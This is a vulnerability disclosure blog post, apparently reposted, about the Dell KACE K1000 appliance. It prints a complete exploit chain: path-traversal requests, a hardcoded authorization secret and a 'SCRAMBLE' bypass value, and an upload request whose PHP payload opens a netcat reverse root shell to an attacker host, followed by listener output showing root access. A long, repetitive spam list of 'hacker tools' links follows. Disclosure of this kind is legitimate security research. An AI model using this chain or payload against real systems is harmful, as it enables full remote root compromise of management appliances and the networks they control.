The Curious Case Of The Ninjamonkeypiratelaser Backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:

POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini   ;
;;;;;;;;;;;;;;;;;;;

That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:

http://targethost/service/kbot_upload.php

This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);
            return;
        }

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:

    private static function calcTokenChecksum($filename, $machineId, $mac)
    {
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
     
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
                   'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
    }

The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksum" check, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  

 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {

Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").

The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:

    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    <?php
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 

Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:

    http://targethost/service/tmp/db.php

On our host:

    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( http://nmap.org/ncat )
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:

Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1

That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:

Related posts

1. Blackhat Hacker Tools
2. Nsa Hacker Tools
3. Ethical Hacker Tools
4. Hack Tools Github
5. Hack Tools
6. Hack Tools Download
7. Hacker Tools Apk Download
8. Hacker Techniques Tools And Incident Handling
9. Pentest Tools
10. Hackrf Tools
11. Hack Tools Online
12. Hacker Tools For Pc
13. Pentest Tools Url Fuzzer
14. Hack Tools For Games
15. Hacking Tools Online
16. Hacker Tools Mac
17. Tools Used For Hacking
18. New Hack Tools
19. Tools For Hacker
20. Pentest Tools For Mac
21. Pentest Tools For Android
22. Hack Website Online Tool
23. Hacking Tools Windows
24. Hacker Techniques Tools And Incident Handling
25. Black Hat Hacker Tools
26. How To Make Hacking Tools
27. Hacker Tools Github
28. Pentest Tools Free
29. Hackrf Tools
30. Pentest Tools Tcp Port Scanner
31. Free Pentest Tools For Windows
32. Pentest Tools Apk
33. Install Pentest Tools Ubuntu
34. Hack Tools For Ubuntu
35. Pentest Tools Website Vulnerability
36. Pentest Tools For Mac
37. What Are Hacking Tools
38. Hacker Tools List
39. Hack Tools
40. Pentest Tools Kali Linux
41. Hack Tools For Games
42. Top Pentest Tools
43. Hack Tools For Pc
44. Hacker
45. Hacker Tools List
46. Hack Tools
47. Pentest Tools Port Scanner
48. Pentest Tools Download
49. Termux Hacking Tools 2019
50. Hacker Tools Github
51. Hacker Tools For Ios
52. Hacker Tools Online
53. What Is Hacking Tools
54. Best Pentesting Tools 2018
55. Game Hacking
56. Hacking Tools Hardware
57. How To Install Pentest Tools In Ubuntu
58. Game Hacking
59. Hacking Tools Pc
60. Hack Tools Online
61. Pentest Tools Tcp Port Scanner
62. Hacker Tools For Mac
63. Hacking Tools 2020
64. Hacker Tools For Mac
65. Hacking Tools And Software
66. Pentest Tools Framework
67. Hacking Tools For Windows
68. How To Install Pentest Tools In Ubuntu
69. Termux Hacking Tools 2019
70. Hacks And Tools
71. Free Pentest Tools For Windows
72. Beginner Hacker Tools
73. Hacker Techniques Tools And Incident Handling
74. Blackhat Hacker Tools
75. Hacker Tools For Windows
76. Hack Tool Apk No Root
77. Hacking Tools Pc
78. Pentest Tools Bluekeep
79. Best Hacking Tools 2019
80. Android Hack Tools Github
81. Hacking Tools Hardware
82. Hack Tool Apk No Root
83. Hacker Tools Hardware
84. Nsa Hacker Tools
85. Growth Hacker Tools
86. Install Pentest Tools Ubuntu
87. Hacking Tools Windows
88. Hacker Tools For Mac
89. Growth Hacker Tools
90. Beginner Hacker Tools
91. Hack Apps
92. Hack Tools For Games
93. Hacking Tools For Windows 7
94. Hacker Tools List
95. World No 1 Hacker Software
96. Hack Tools
97. Pentest Box Tools Download
98. Pentest Tools Linux
99. Hack Rom Tools
100. Hacking Tools For Pc
101. Pentest Tools Open Source
102. Pentest Tools
103. Hacking Tools And Software
104. Free Pentest Tools For Windows
105. Pentest Tools For Android
106. Tools For Hacker
107. Pentest Tools For Windows
108. Hack Rom Tools
109. Hacker Tools 2019
110. Hacker Security Tools
111. Hack Tools For Mac
112. Nsa Hacker Tools
113. Hacking Tools For Kali Linux
114. Hack Tools 2019
115. Ethical Hacker Tools
116. Hacker Tools Github
117. Hacker Tools Apk Download
118. Hacking Tools And Software
119. Nsa Hacker Tools
120. Hacker Tools For Windows
121. Termux Hacking Tools 2019